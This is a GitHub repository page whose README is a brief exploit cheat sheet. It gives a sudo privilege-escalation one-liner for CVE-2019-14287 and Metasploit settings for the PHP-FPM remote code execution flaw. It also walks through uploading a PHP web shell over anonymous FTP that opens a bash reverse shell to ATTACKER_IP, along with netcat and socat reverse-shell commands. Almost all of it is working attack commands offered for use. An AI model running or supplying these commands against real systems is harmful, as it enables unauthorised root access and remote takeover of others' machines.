Skip to content

JavierGomezSanchez/cve_exploits

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits

README.md

README.md

 
 

Repository files navigation

cve_exploits

CVE-2019-14287 (Sudoers privilege escalation)

  1. On target launch next command to get root shell
    2. sudo -lu#-1 /bin/bash

CVE-2019-11043 (Nginx + PHP-FPM buffer overflow)

  1. Use Metasploit exploit(multi/http/php_fpm_rce)
    2. RHOST=TARGET_IP 
    
RPORT=TARGET_PORT 
    
TARGETURI=/target_vulnerable_file.php

CVE-1999-0527 (FTP server with world writable directories)

  1. Anonymous FTP Login with user "anonymous" and no password on target FTP
  2. On target FTP upload reversephpshell.php 
    3. <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1'");?>
  3. On attacker launch
    4. nc -v -n -l -p ATTACKER_PORT
  4. On target call reverseshell
    5. http://TARGET_IP:TARGET_PORT/reversephpshell.php

Others

Socat Reverse Shell

On attacker

socat file:`tty`,raw,echo=0 tcp-listen:ATTACKER_PORT

On target

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:ATTACKER_PORT;

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published